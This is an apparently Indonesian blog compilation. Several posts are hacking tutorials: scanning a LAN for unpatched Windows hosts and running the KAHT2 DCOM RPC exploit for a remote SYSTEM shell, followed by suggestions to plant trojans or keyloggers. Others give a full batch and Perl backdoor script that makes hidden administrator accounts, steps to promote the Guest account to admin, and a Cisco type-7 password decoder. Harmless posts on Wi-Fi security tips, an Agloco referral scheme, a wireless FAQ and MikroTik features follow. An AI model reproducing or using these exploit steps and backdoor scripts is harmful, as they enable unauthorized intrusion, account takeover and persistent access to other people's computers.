Sumber balihack.or.id
Tutorial ini murni hanya untuk pembelajaran (level pemula). Walaupun bugs udah sangat lama, tp untuk menambah wawasan sangat perlu. Basa basi cukup, sekarang alat alat yang dipakai :

1.RPCScan 2.03
2.Kaht2
3.Angry IP Scanner 2.21 http://www.winaddons.com/angry-ip-scanner-221/
4.Analisa ( tidak bikin pusing kok)
5.Secangkir anggur…..hee kopi maksun nya:P

Langkah pertama
Laptop/komputer kita sudah terhubung kejaringan dan mendapat alamat IP lokal. Cek IP kita. Misal IP kita dapat adalah 192.168.100.100 dengan subnet 255.255.0.0 berarti jika kita lihat, kita berada network type class C. Kemungkinan IP yang ada dijaringan tersebut adalah 192.168.0.0-192.168.255. Misalkan lagi alamat IP yang kita dapat 168.0.0.10 dengan subnet 255.255.255.0 berarti kita berada di network dengan type class B dan kemungkinan alamat IP yang dipakai antara 168.0.0.1-168.0.0.254

Langkah kedua
Buka program Angry IP Scanner 2.21, klik options lalu klik options lg, pada group display pilih only alive. Itu menandakan kita menampilkan komputer yang hidup saja. Alamat IP komputer yang hidup berwarna bulatan biru dan yang mati berwarna merah. Karena kita sudah tahu alamat yang mungkin pada jaringan tersebut tinggal kita masukkan IP range 192.168.0.0 to 192.168.255.255 (istilah kerennya scanning masal). waktu yang dibutuhkan untuk melakukan scaning IP tersebut memakan waktu yang lama, nah disaat seperti ini perlu rokok marlboro mentolnya he..he…! atau kalau anda tidak punya waktu banyak, cukup scan IP yang dekat dekat kita saja. Contoh alamat IP kita 192.168.100.100, IP yang kita scan adalah 192.168.100.1-192.168.100.254. setelah semua disetting klik START. Akan didapat komputer yang hidup (jika anda beruntung).

Langkah ketiga
Setelah kita mendapatkan komputer yang hidup. Sekarang buka RPCScan, masukkan alamat IP komputer yang hidup ke host name. Atau kita bisa memasukkan IP kita pada :
Start IP (awal IP yg di scanning)
End IP (akhir IP yg di scanning)
lalu tekan ->(masukkan semua IP yang hidup). Klik Start(tanda panah biru).Cek hasil scanning, jika status VULNERABLE berarti komputer dengan alamat IP tersebut masih menggunakan windows service pack 1 kebawah. Berarti anda beruntung….

Langkah keempat
Panggil program kaht2 anda..! misal alamat IP yang vulnerable 192.168.100.10

D: \hacking\tools\kaht2>kaht2
_________________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
PUBLIC VERSION
________________________________________________
Usage: KaHt2.exe IP1 IP2 [THREADS] [AH]
example: KaHt2.exe 192.168.0.0 192.168.255.255
NEW!: Macros Available in shell enviroment!!
Type !! for more info into a shell.

D: \hacking\tools\kaht2>kaht2 192.168.100.9 192.168.100.10

Jika berhasil masuk kekomputer target, command akan kita akan berubah menjadi
C:\WINDOWS\system32>

Berarti komputer tersebut sudah menjadi tanggung jawab anda, silahkan berkreasi sendiri. Mungkin dengan menanamkan trojan, keyloger dan lain2 tergantung tingkat kekejaman anda. Atau Cuma lihat semua isi drive nya. Tapi tidak dianjurkan untuk berbuat jahat…Ingat Dilarang Berbuat JAHAT
SMDhack crew yang baru Oroch1 selamat bergabung.

8 tips keamanan jaringan nirkabel di rumah anda

8 Tips Keamanan Jaringan Nirkabel di Rumah Anda


8 Tips Keamanan Jaringan Nirkabel di Rumah Anda
Posted by intrik on 13th May 2007

Saat ini banyak orang yang mulai memasang jaringan komputer nirkabel di rumah mereka (wireless home network) yang mana bisa segera digunakan oleh mereka untuk terhubung ke internet. Contohnya si Agung, karyawan salah satu perusahaan TI di Surabaya telah berlangganan akses internet ADSL melalui Telkom Speedy. Agung membeli modem ADSL yang dilengkapi pula dengan fasilitas wireless atau Wi-Fi. Dia membeli model itu karena dia memiliki dua buah komputer di rumahnya, sebuah laptop dan desktop PC. Semuanya telah dilengkapi dengan Wi-Fi card dan dia menginginkan semuanya terhubung ke internet melalui access point yang dia buat sendiri. Selain itu Agung juga memiliki sebuah PDA yang mana terkadang dia perlu akses ke internet dari PDA nya ketika dia di rumah. Tepatlah jika ia membangun access point di rumahnya sendiri.Tetapi masalah selalu saja muncul. Sudah amankah jaringan nirkabel atau access point yang dia buat? Jangan-jangan di sebelah rumah ada hacker yang mengintip data Anda atau juga malah ikut menikmati akses internet dengan gratis. Untuk itu melalui tulisan kali ini akan disajikan beberapa tips yang berhubungan dengan jaringan nirkabel di rumah Anda.

1. Ganti Password Administrator default (bila perlu ganti pula usernamenya)

Jantung dari jaringan Wi-Fi di rumah Anda adalah access point atau router. Untuk melakukan set up dari peralatan access point ini, maka vendor dari access point device akan memberikan suatu interface yang berbasis web, dimana untuk masuk ke dalam interface ini maka Anda harus mengisikan username dan password. Sementara itu, pada beberapa kasus, peralatan access point tersebut di set oleh vendor dengan suatu username dan password tertentu yang mudah ditebak oleh pengguna. Untuk itu Anda harus mengganti password default dari access point Anda. Bahkan bila perlu Anda juga ubah username yang ada.

2. Aktifkan enkripsi

Semua peralatan Wi-Fi pasti mendukung beberapa bentuk dari keamanan data. Intinya enkripsi akan mengacak data yang dikirim pada jaringan nirkabel sehingga tidak mudah dibaca oleh pihak lain. Peralatan Wi-Fi saat ini sudah menyediakan pilihan teknologi security yang bisa Anda gunakan sesuai dengan kebutuhan. Pastikan semua peralatan dalam jaringan nirkabel Anda juga menggunakan setting security yang sama seperti yang digunakan pada access point.

3. Ganti SSID default

Access point atau router menggunakan suatu nama jaringan yang disebut dengan SSID. Vendor biasanya memberi nama produk access point mereka dengan suatu default SSID. Sebagai contoh, SSID yang dirilis oleh Linksys biasanya adalah “linksys”. Kenyataannya memang apabila seseorang mengetahui sebuah SSID maka ia belum tentu bisa membobol jaringan tersebut, tetapi paling tidak ini adalah suatu awal baginya. Di mata seorang hacker, apabila melihat suatu SSID yang masih default, maka itu indikasi bahwa access point tersebut tidak dikonfigurasi dengan baik dan ada kemungkinan untuk dibobol. Ganti SSID default Anda segera setelah Anda menset-up access point.

4. Aktifkan MAC Address filtering

Setiap peralatan Wi-Fi pastilah memiliki suatu identifikasi yang unik yang dinamakan “physical address” atau MAC address. Access point atau router akan mencatat setiap MAC address dari peranti yang terhubung kepadanya. Anda bisa set bahwa hanya peranti dengan MAC address tertentu saja yang boleh mengakses ke dalam jaringan nirkabel Anda. Misalnya PDA Anda memiliki MAC address tertentu, kemudian Anda masukkan MAC address PDA Anda ke dalam filter MAC address pada access point Anda. Jadi yang bisa terhubung ke jaringan sementara ini hanyalah dari PDA Anda. Tapi Anda juga tetap hati-hati, karena hacker bisa saja membuat MAC address tipuan untuk mengakali filtering ini.

5. Matikan broadcast dari SSID

Dalam jaringan Wi-Fi, maka access point atau router biasanya akan membroadcast SSID secara reguler. Fitur ini memang sengaja didesain bagi hotspot area yang mana klien Wi-Fi pada area tersebut bisa saja datang dan pergi dengan cepat. Dalam kondisi di rumah Anda yang mana SSID nya pasti sudah Anda ketahui sendiri, maka fitur ini tidak perlu diaktifkan karena bisa mengundang tetangga sebelah untuk mengetahui SSID Anda atau juga mencegah orang lain menumpang jaringan internet Anda dengan gratis. Anda bisa nonaktifkan fasilitas broadcast SSID ini demi keamanan jaringan Anda.

6. Berikan alamat IP statis kepada peranti Wi-Fi

Saat ini cenderung orang memanfaatkan DHCP untuk memberikan alamat IP secara otomatis kepada klien yang ingin terhubung ke jaringan nirkabel. Ini memang cara yang cepat dan mudah bagi jaringan Anda, tetapi ingat bahwa ini juga cara mudah bagi hacker untuk mendapatkan alamat IP yang valid pada jaringan nirkabel Anda. Anda bisa mematikan fitur DHCP pada acces point dan set suatu rentang alamat IP yang sudah fix dan set pula peranti Wi-Fi Anda yang ingin terkoneksi ke access point dengan rentang alamat-alamat IP yang fix tadi.

7. Pikirkan lokasi access point atau router yang aman

Sinyal Wi-Fi secara normal bisa menjangkau sampai keluar rumah Anda. Sinyal yang bocor sampai keluar rumah sangat berisiko tinggi untuk timbulnya eksplotasi terhadap jaringan nirkabel Anda. Anda harus meletakkan peralatan access point Anda pada daerah sekitar ruang tengah dari rumah Anda. Jangan sekali-kali meletakkan access point atau router di dekat jendela, karena akan semakin meningkatkan jangkauan sinyal Wi-Fi Anda ke luar rumah.

8. Matikan saja jaringan nirkabel jika sedang tidak digunakan

Aturan keamanan yang paling ampuh adalah dengan mematikan peralatan jaringan atau access point ketika sedang tidak digunakan. Misalnya saja, jangan sekali-kali meninggalkan rumah dengan Wi-Fi yang menyala, walaupun itu untuk keperluan download data. Access point yang menyala tanpa ada yang memantau sangat berisiko tinggi terhadap eksploitasi

backd00ring WINDOS XP && 2000

== Backd00ring WINDOS XP && 2000 ==



Pengantar

Tulisan ini dibuat untuk membuktikan bahwa sabotase account admin
pada windows juga dapat dilakukan secara lokal, bisa dengan
menggunakan software yang sama, atau bahkan tanpa software sama sekali
tulisan ini juga menyambung artikel yang di buat oleh the_day,
tetapi di khususkan untuk eksploitasi secara lokal .


artikel ini ditujukan untuk :
- buat yang lupa password admin :p
- buat yang mimpi pengen jadi admin :P
- buat yang dendam sama admin karena di curangin :)
- buat yang mau belajar exploitasi windows
- buat yang mau tau kebobrokan windows
- ..... (isi ndiri, kenapa kamu tertarik baca ini)

bahan yang di perlukan :
-sploits RPC DCOM : *kaht2 (for windust)
-account user biasa or minimal Guest

dari user biasa :

1. ekstrak kaht2 yang dimiliki, biar mudah taruh aja di C:\
terus jalankan :
start > run > command >

masuk ke c:\ipconfig or kalo males pake ip jaringan bisa pake
ip buat loopback yaitu 127.0.0.1

ketik aja:
c:\kaht2 127.0.0.01 127.0.0.1

_________________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
PUBLIC VERSION :P
________________________________________________

[+] Targets: 127.0.0.0-127.0.0.1 with 50 Threads
[+] Attacking Port: 135. Remote Shell at port: 328
[+] Scan In Progress...
- Connecting to 127.0.0.1
Sending Exploit to a [WinXP] Server...
- Conectando con la Shell Remota...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


masuk deh :D dengan account Administrator

sekarang kamu mau ngapain? bikin backdoor aja or mau buat account baru
admin or jadiin account kamu admin ?

a. bikin backdoor aja :D
kalo ini kamu kudu cari account yang gak di aktifkan sehingga user
tersebut gak terdeteksi pada halaman login user :P
biasanya account Guest yang dibuat tidak aktif padahal masih ada/default
nah kamu bisa jadikan ini backdoor kamu , semisal kamu mau remote or
login biasa :)

gimana caranya ? belajar :P , just kiddding!

kamu ketik sintax berikut ini , bair jelasnya kamu liat dulu account guest
ada apa kagak ? pake sintax net user

C:\WINDOWS\system32>net user

net user

User accounts for \\

------------------------------------------------------------------------------
Administrator Guest HelpAssistant
SUPPORT_388945a0 y3dips
The command completed with one or more errors.



(cat : lihat ada beberapa account yang tercipta di situ dan dapat di
manfaatkan :P)

YUPe, ternyata ada account guest, biar jelas apa dia aktif or kagak
kita ketik aje net user Guest

C:\WINDOWS\system32>net user Guest
net user Guest
User name Guest
Full Name
Comment Built-in account for guest access to the computer/d
omain
User's comment
Country code 000 (System Default)
Account active No <=====gak aktif :p
Account expires Never

Password last set 2/29/2004 3:58 AM
Password expires Never
Password changeable 2/29/2004 3:58 AM
Password required No
User may change password No

Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/29/2004 3:42 AM

Logon hours allowed All

Local Group Memberships *Guests
Global Group memberships *None
The command completed successfully.

hehehehe, ternyata gak aktif euy..

sekarang kita jadikan backdoor pake perintah

C:\WINDOWS\system32>net localgroup Administrators Guest /add

menjadikan user Guest menjadi group Administrators.

oke! kelar sudah jika kita perlu sekali-sekali maka tinggal memakai
account ini, awas jangan sampai di ambil orang lo...
or mau dikasih password aja, biar lebih asyik :D


b. buat account sebagai admin

setelah dapet command prompt sebagai admin hasil dari eksploitasi dengan
kaht2 atau echokillrpc, maka tinggal jalankan exploits echobacd00r.bat
atau echobackd00r.exe yang dapat anda letakkan pada disket atau telah
copikan ke C:\Windows\system32\

sehingga tinggal ketik

c:\windows\system32\echobacd00r.bat

selesai!!!

atau jika anda tidak menggunakan echobackd00r.bat atau echobackd00r.exe
anda dapat mengetikkan secara manual dengan penggunaan net user dan
net localgroup, untuk detilnya sama seperti pembuatan account admin
pada artikel the_day tentang hacking windows 2000



2 . Ekploitasi karena kelemahan windust apabila saat installasi gak
ngisiin password admin (inget gak!!)

cara termudah adalah kamu masuk ke windows, saat booting tekan
F8, terus pilih safe mode dengan command prompt
setelah itu mausk deh ke account admin, :P

pake command prompt dan perintah net user untuk add user dan
pake sintax net localgroup untuk jadikan user tsb admin ..

cat: terbukti pada beberapa pc yang di install di komputer
tempat bekerja yang ternyata dibiartkan dengan admin yang
tak berpassword :D,
(keasyikan buat click-click duang kali )


3. Eksploitasi lokal dengan menggunakan :
1. Disk bootable,+ echobackd00r.bat/echobackd00r.exe (jika ada)
2. Eksploits kaht2

masukkan disket,
apabila masuk ke command prompt maka silakan eksekusi langsung kaht2nya

selanjutnya tinggal modifikasi account yang ada atau ciptakan account baru
(dapat menggunakan echobackd00r.bat atau secara manual)


cara ini dilakukan jika cara 1 dan 2 tidak bisa di lakukan
(cat : cara 1: account user biasa gak ada, cara 2: account admin
dengan F8 diberi password)

[perintah net user ]

NET USER
[username [password | *] [options]] [/DOMAIN]
username {password | *} /ADD [options] [/DOMAIN]
username [/DELETE] [/DOMAIN]

NET USER creates and modifies user accounts on computers. When used
without switches, it lists the user accounts for the computer. The
user account information is stored in the user accounts database.

This command works only on servers.


username Is the name of the user account to add, delete, modify, or
view. The name of the user account can have as many as
20 characters.
password Assigns or changes a password for the user's account.
A password must satisfy the minimum length set with the
/MINPWLEN option of the NET ACCOUNTS command. It can have as
many as 14 characters.
* Produces a prompt for the password. The password is not
displayed when you type it at a password prompt.
/DOMAIN Performs the operation on a domain controller of
the current domain.
/ADD Adds a user account to the user accounts database.
/DELETE Removes a user account from the user accounts database.

Options Are as follows:

Options Description
--------------------------------------------------------------------
/ACTIVE:{YES | NO} Activates or deactivates the account. If
the account is not active, the user cannot
access the server. The default is YES.
/COMMENT:"text" Provides a descriptive comment about the
user's account (maximum of 48 characters).
Enclose the text in quotation marks.
/COUNTRYCODE:nnn Uses the operating system country code to
implement the specified language files for a
user's help and error messages. A value of
0 signifies the default country code.
/EXPIRES:{date | NEVER} Causes the account to expire if date is
set. NEVER sets no time limit on the
account. An expiration date is in the
form mm/dd/yy or dd/mm/yy, depending on the
country code. Months can be a number,
spelled out, or abbreviated with three
letters. Year can be two or four numbers.
Use slashes(/) (no spaces) to separate
parts of the date.
/FULLNAME:"name" Is a user's full name (rather than a
username). Enclose the name in quotation
marks.
/HOMEDIR:pathname Sets the path for the user's home directory.
The path must exist.
/PASSWORDCHG:{YES | NO} Specifies whether users can change their
own password. The default is YES.
/PASSWORDREQ:{YES | NO} Specifies whether a user account must have
a password. The default is YES.
/PROFILEPATH[:path] Sets a path for the user's logon profile.
/SCRIPTPATH:pathname Is the location of the user's logon
script.
/TIMES:{times | ALL} Is the logon hours. TIMES is expressed as
day[-day][,day[-day]],time[-time][,time
[-time]], limited to 1-hour increments.
Days can be spelled out or abbreviated.
Hours can be 12- or 24-hour notation. For
12-hour notation, use am, pm, a.m., or
p.m. ALL means a user can always log on,
and a blank value means a user can never
log on. Separate day and time entries with
a comma, and separate multiple day and time
entries with a semicolon.
/USERCOMMENT:"text" Lets an administrator add or change the User
Comment for the account.
/WORKSTATIONS:{computername[,...] | *}
Lists as many as eight computers from
which a user can log on to the network. If
/WORKSTATIONS has no list or if the list is *,
the user can log on from any computer.

NET HELP command | MORE displays Help one screen at a time.


: :berikut di cantumkan 2 buah script backd00r

[echobackd00r.bat]

cut here &<-----------------------------------------------------------



rem *echobackd00r.bat
rem *Maret 2004 - backd00r untuk XP && 2000
rem *dibuat untuk mempermudah menciptakan account admin
rem *Kombinasikan dengan SPLOITS untuk mendapatkan Account admin ex: kaht2
rem *atau masuk ke pc yang masih default dengan disket :P baca eksploits lokal
rem *cara pakai, ubah dulu USER="backdoor"
rem *cara pakai, ubah dulu PASS="password"


rem *MULAI.

@echo off
PROMPT $P$G
cls
Color 87
GOto iklan

:setting

rem *ganti USER dan PASS

set USER="backdoor"
set PASS="password"

if %USER%=="backdoor" Goto gagal else GOto proses

:proses

rem *masuk ke perintah tuk nambahin user + passwordnya

net user %USER% %PASS% /add
net localgroup Administrators %USER% /add
net localgroup Users %USER% /delete

cls
echo.
echo Account %USER% dengan password %PASS% telah berhasil di buat!
color 70


EXIT

:iklan

rem * just a banner from me :) , bisa di hilangkan :p

echo.
echo #####################################################
echo # #
echo # Echobackd00r #
echo # dibuat dan di coba oleh y3dips with XP OS #
echo # greetz to :the_day for idea, moby, z3r0byt3,comex #
echo # note: ubah USER dan PASS #
echo # #
echo #####################################################
echo.
echo tekan ENTER !!!
pause>nul

Goto setting

:gagal

echo.
echo edit file echobackd00r.bat dan ubah USER dan PASSnya
echo.


rem *SELESAI.
rem *created by y3dips : maret 2004 : http://echo.or.id


cut here &<-----------------------------------------------------------




[echobackd00r.pl > ubah ke exe dengan perl2exe]

cut here &<-----------------------------------------------------------


# echobackd00r.pl digunakan untuk membuat account admin pada Windows XP, 2000
# kombinasikan dengan sploits RPC DCOM seperti KAHT2 dsb
# ubah ke exe dengan perl2exe

#!/usr/bin/perl

printf"\n **********************************************************\n";
print " * *\n";
print " * Echobackd00r *\n";
print " * created && tested by y3dips on XP Operating Sys *\n";
print " * greetz : the_day (untuk idenya), moby, comex, z3r0byt3 *\n";
print " * echo-memberz, newbie_hacker, puji_tiwili* *\n";
print " * *\n";
printf" **********************************************************\n\n";

if(@ARGV == 2)
{

$uname = $ARGV[0];
$password = $ARGV[1];

{
system(" net user $uname $password /add ");
system(" net localgroup Administrators $uname /add ");
system(" net localgroup Users $uname /delete ");
}
}

else
{
print " [Gunakan] echobackd00r.exe username password \n";
}


# end.
# created by y3dips : download from http://echo.or.id


cut here &<-----------------------------------------------------------




EOF.


Penutup.
tulisan ini tetap seperti tulisan-tulisan terdahulu yang ditujukan
untuk pendidikan dan bertujuan untuk membukakan mata kita semua terhadap
pentingnya security, segala bentuk penyalahgunaan adalah bukan merupakan
tanggung jawab penulis .




*greetz to:
[echostaff a.k.a moby, the_day, comex ,z3r0byt3], echo memberz,
anak anak newbie_hacker,$peci@l temen2 seperjuangan

kirimkan kritik && saran ke y3dips[at]echo.or.id

*/0x79/0x33/0x64/0x69/0x70/0x73/* (c)2004

backd00ring WINDOS XP && 2000

9/16/2007

crak password

Crack Cisco Password
12

09

2007
Tadi ketika mau masuk router yang sering dikunjungi, ga tau kenapa tiba-tiba lupa password. Zzinkk!! tau-tau mau nginget susah banget. Karena lagi ga terlalu sibuk, iseng2 liat backup konfigurasi routernya.

hostname ach_keren
!
enable secret 5 $1$SKOf$u9nY/jWlSGpdUdfJDf98
enable password 7 xxxxxxx
!
username ach password 7 xxxxxxxx
username admin privilege 15 password 7 xxxxxx



Argh.. daripada mikir, mendingan iseng2 coba cari cara crack-nya di internet…

Cari-cari di google.. loh.. ternyata sudah banyak toh artikelnya.. trus juga udah lama toh bisa di crack… hehe..

Nah.. sekarang coba-coba ah….

hmmm… karena banyak versinya, cobain yang pake perl n web aja ah… (yg make C males compile nya :-p )

coba yang perl dulu ah…

ambil source code nya dari sini


#
# Credits for orginal code and description hobbit@avian.org,
# SPHiXe, .mudge et al. and for John Bashinski
# for Cisco IOS password encryption facts.
#
# Use for any malice or illegal purposes strictly prohibited!
#
@xlat = ( 0×64, 0×73, 0×66, 0×64, 0×3b, 0×6b, 0×66, 0×6f, 0×41,
0×2c, 0×2e, 0×69, 0×79, 0×65, 0×77, 0×72, 0×6b, 0×6c,
0×64, 0×4a, 0×4b, 0×44, 0×48, 0×53 , 0×55, 0×42 );
while (<>) {
if (/(password|md5)\s+7\s+([\da-f]+)/io) {
if (!(length($2) & 1)) {
$ep = $2; $dp = “”;
($s, $e) = ($2 =~ /^(..)(.+)/o);
for ($i = 0; $i < length($e); $i+=2) {
$dp .= sprintf “%c”,hex(substr($e,$i,2))^$xlat[$s++];
}
s/7\s+$ep/$dp/;
}
}
print;
}
# eof

Trus buat file baru yg isinya :

username ach password 7 xxxxxxxx
username admin privilege 15 password 7 xxxxxx

Trus jalanin deh file perlnya…

[chaidir@aCh ~]$ ./cisco.pl test
username ach password achaikerendeh
username admin privilege 15 password achaikerenbangetdeh

Hore… hore… ketemu lagi passwordnya…

duh.. jd serem ngasih priviledge 15, apa mendingan lgsg enable secret aja ya??

Nah, klo mau nyoba yang lebih mudah lagi.. mendingan langsung lewat web sini

Yosh!! karena dah nemu passwordnya… kembali ke laptop!!

Kerja lagi kitah….

Referensi :

http://insecure.org/sploits/cisco.passwords.html

http://www.cisco.com/warp/public/701/64.html

http://onno.vlsm.org/v01/OnnoWPurbo/contrib/network/network-security/cisco-pass-the-password.txt

http://www.ifm.net.nz/cookbooks/passwordcracker.html

cara mendaftar di wordpress

Cara Mendaftar


Cara mendaftar agloco sangat mudah, bisa dilakukan hanya dalam waktu tidak lebih dari 5 menit :

1. Klik tombol “Join Now” atau link menu “Mendaftar Agloco”

2. Isi form dengan data Anda.

3. Baca email dari Agloco untuk konfirmasi dan mendapatkan ID keanggotaan

4. sekali lagi jangan lupa buka email anda dan lakukan verifikasi. ini penting agar anda terdaftae sebagai member.

5. sign in ke site agloco.com

6.masukan email anda dan copy pasword yang ada pada email anda

7.lakukan perubahan pasword baru anda sesuai dengan yang anda inginkan

8.enjoy with it,

9. download viewbar agloco, menu pilihan download alternate supaya lebih mudah

10. setelah selesai download instal viewbarnya pada komputer anda dan masukan no ID dan pasword baru anda

11.ingat anda hanya membutuhkan waktu 5 jam setiap bulanya untuk menghasilkan uang anda.

cukup mudah bukan?? tapi ingat jika anda ingin meningkatkan penghasilan anda, anda wajib membangun jaringan anda, tentunya dengan mempromosikan referall /no ID anda pada teman anda. jika ingin lebih cepat membangun jaringan alangkah tepatnya jika anda membuat blog seprti saya dan memberitahukan alamat sitenya pada temen-temen di friendster anda!!!

SELAMAT BERGABUNG DAN HASILKAN UANG SEBANYAK_BANYAKNYA!!!

apa itu WAN

apakah WLAN = Wireless LAN


1. Apa yang dimaksud dengan Wireless LAN?

Wireless LAN merupakan Local Area Network (LAN) yang menggunakan teknologi Wireless (tanpa kabel / nirkabel)




2. Apa perbedaan antara jaringan kabel & jaringan wireless?


Jaringan Wireless memiliki keunggulan sebagai berikut :
1. Pemeliharaan murah
2. Infrastruktur berdimensi kecil
3. Pembangunan cepat
4. Mudah dan murah untuk direlokasi dan mendukung portabilitas
5. Koneksi internet akses 24 jam
6. Akses internet yang cepat
7. Bebas tanpa pulsa telepon
Jaringan Wireless memiliki kelemahan sebagai berikut :
1. Biaya peralatan mahal
2. Delay yang sangat besar
3. Kesulitan karena masalah propagasi radio
4. Keamanan data
5. Kapasitas jaringan karena keterbatasan spektrum


3. Apa yang dimaksud dengan FHSS & DSSS ?

Frequency Hopping Spread Spectrum (FHSS) adalah teknik yang memodulasi sinyal informasi dengan frekuensi yang loncat-loncat (tidak konstan). Frekuensi yang berubah-ubah ini dipilih oleh kode-kode tertentu.
Direct Sequence Spread Spectrum (DSSS) adalah teknik yang memodulasi sinyal informasi secara langsung dengan kode-kode tertentu (deretan kode Pseudonoise/PN dengan satuan chip).


4. Apa yang dimaksud dengan koneksi Point to Point (P2P)?

Suatu konfigurasi jaringan wireless yang hanya menghubungkan dua titik .


5. Apa yang dimaksud dengan koneksi Point to Multi Point (P2MP)?

Suatu konfigurasi jaringan wireless yang menghubungkan banyak titik (multi point) dimana satu titik dipergunakan sebagai base yang melayani beberapa client.


6. Perangkat apa yang dibutuhkan untuk koneksi P2P?

Perangkat yang dibutuhkan adalah : Grid antenna, cable, pigtail, lightning protector, PC Card, dan Router.




7. Perangkat apa yang dibutuhkan untuk koneksi P2MP?

Perangkat yang dibutuhkan adalah :


Di sisi client : idem dengan P2P


Di sisi base : omni antenna / sectorial panel , cable, pigtail, lightning protector, PC Card, dan Router.


8. Produk apa saja yang bisa saya gunakan sebagai router?

1.
Access Point (AP), yaitu bridge yang biasanya dipasang pada Base Station.

2.
Remote Outdoor Router (ROR), yaitu router yang biasanya dipasang pada Client Station.

3.
Central Outdoor Router (COR), dapat sebagai bridge atau router dan biasanya dirancang khusus untuk Base Station.


9. Apa keuntungan penggunaan Linux sebagai Operating System?

1.
2.

3.
Gratis serta open source.
Tidak membutuhkan resource hardware yang tinggi, bahkan dapat bekerja dengan hanya menggunakan satu buah disket.
Terus berkembang.


=10. Berapa jarak jangkauan perangkat wirelessLAN ini?

Sekitar 5 km, jika menggunakan amplifier 1 watt bisa mencapai 40 km


13. Syarat apa yang harus dipenuhi untuk bisa membangun koneksi wirelessLAN?

Ada dua syarat utama untuk pembangunan koneksi ini

Pertama
Lokasi harus line of Sight / LoS, dalam arti tidak ada halangan (bisa berupa gedung atau pohon) di antara kedua titik yang akan dihubungkan.

Kedua
Freznel Zone (area rambatan gelombang radio yang dipancarkan oleh kedua antenna) tidak terpotong atau terganggu suatu benda


14. Apakah betul kita perlu membangun tower yang setinggi-tingginya?

Tidak Betul. Untuk menentukan tinggi tower diperlukakan survey terlebih dahulu. Pada prinsipnya, tinggi tower sangat tergantung pada posisi gedung tempat antenna client akan dipasang serta posisi base station


.15. Apakah yang dimaksud dengan client antenna?

Client antenna sebenarnya adalah antenna yang digunakan di sisi client dan hanya berfungsi satu arah (sebagai penerima signal saja).


16. Apakah yang dimaksud dengan Base antenna?

Base antenna adalah sebuah perangkat antenna yang berfungsi sebagai pemancar signal, ada yang 90 derajat, 180 derajat, dan 360 derajat




17. Saya berlangganan koneksi 48Kbps, tapi kenapa kok kalau download
hanya mendapatkan thruput kurang dari 6KB? Bukankah saya seharusnya mendapatkan download speed 48 KB?

8Kbps itu 48 Kilo’bits’ per second

1 Bytes
48 bits
48 Kbps
= 8 bits.
= 6 bytes.
= 6 KBps




b (b kecil) biasanya untuk bit.
B (B besar) biasanya untuk byte.
Ada juga yang namanya tcp overhead. Jadi 6 Bytes tsb tidak akan murni
6 Bytes, tapi 6 Bytes - overhead.


18. Untuk kondisi line of sight (LOS) berapa jarak maximum yang bisa dijangkau Sistem Wireless LAN ?

Tergantung dengan peralatan yang dipilih. Berikut spesifikasi beberapa konfigurasi yang kami sediakan.
Konfigurasi A :


Base
: antenna set omni 15 dB dengan kabel LMR400 22.5 meter

Client
: antenna set 24 dB grid dengan kabel LMR400 22.5 meter


speed
11 Mbps
5.5 Mbps
2 Mbps
1 Mbps



max distance
fade margin
0.6 freznel
1.50 km
15.15 dB
4.20 m
2.50 km
15.72 dB
5.50 m
4.00 km
15.63 dB
6.80 m
6.00 km
15.11 dB
8.50 m



sensitivitas
-82.00 dBm
-87.00 dBm
-91.00 dBm
-94.00 dBm



Kecepatan bisa diset di router-nya, semakin rendah kecepatan, sensitivitas
receiver meningkat sehingga jarak yang bisa dicapai akan semakin jauh



.

Konfigurasi B :


Base
: antenna set panel sector 19 dB dengan kabel LMR600 45 meter

Client
: antetnna set 24 dB grid dengan kabel LMR400 22.5 meter


speed
11 Mbps
5.5 Mbps
2 Mbps
1 Mbps


max distance
fade margin
0.6 freznel
2.00 km
15.12 dB
5.00 m
3.50 km
15.25 dB
6.50 m
5.50 km
15.33 dB
8.00 m
8.00 km
15.07 dB
10.00 m


sensitivitas
-82.00 dBm
-87.00 dBm
-91.00 dBm
-94.00 dBm


Kecepatan bisa diset di router-nya, semakin rendah kecepatan, sensitivitas
receiver meningkat sehingga jarak yang bisa dicapai akan semakin jauh.







tutorial step by step seting MikroTik

Tutorial Step By Step Seting MikroTik

MikroTik RouterOS™ adalah sistem operasi linux yang dapat digunakan untuk menjadikan komputer menjadi router network yang handal, mencakup berbagai fitur yang dibuat untuk ip network dan jaringan wireless, cocok digunakan oleh ISP dan provider hostspot.

Ada pun fitur2 nya sbb:

* Firewall and NAT - stateful packet filtering; Peer-to-Peer protocol filtering; source and destination NAT; classification by source MAC, IP addresses (networks or a list of networks) and address types, port range, IP protocols, protocol options (ICMP type, TCP flags and MSS), interfaces, internal packet and connection marks, ToS (DSCP) byte, content, matching sequence/frequency, packet size, time and more…

* Routing - Static routing; Equal cost multi-path routing; Policy based routing (classification done in firewall); RIP v1 / v2, OSPF v2, BGP v4

* Data Rate Management - Hierarchical HTB QoS system with bursts; per IP / protocol / subnet / port / firewall mark; PCQ, RED, SFQ, FIFO queue; CIR, MIR, contention ratios, dynamic client rate equalizing (PCQ), bursts, Peer-to-Peer protocol limitation

* HotSpot - HotSpot Gateway with RADIUS authentication and accounting; true Plug-and-Play access for network users; data rate limitation; differentiated firewall; traffic quota; real-time status information; walled-garden; customized HTML login pages; iPass support; SSL secure authentication; advertisement support

* Point-to-Point tunneling protocols - PPTP, PPPoE and L2TP Access Concentrators and clients; PAP, CHAP, MSCHAPv1 and MSCHAPv2 authentication protocols; RADIUS authentication and accounting; MPPE encryption; compression for PPPoE; data rate limitation; differentiated firewall; PPPoE dial on demand

* Simple tunnels - IPIP tunnels, EoIP (Ethernet over IP)

* IPsec - IP security AH and ESP protocols; MODP Diffie-Hellman groups 1,2,5; MD5 and SHA1 hashing algorithms; DES, 3DES, AES-128, AES-192, AES-256 encryption algorithms; Perfect Forwarding Secrecy (PFS) MODP groups 1,2,5

* Proxy - FTP and HTTP caching proxy server; HTTPS proxy; transparent DNS and HTTP proxying; SOCKS protocol support; DNS static entries; support for caching on a separate drive; access control lists; caching lists; parent proxy support

* DHCP - DHCP server per interface; DHCP relay; DHCP client; multiple DHCP networks; static and dynamic DHCP leases; RADIUS support

* VRRP - VRRP protocol for high availability

* UPnP - Universal Plug-and-Play support

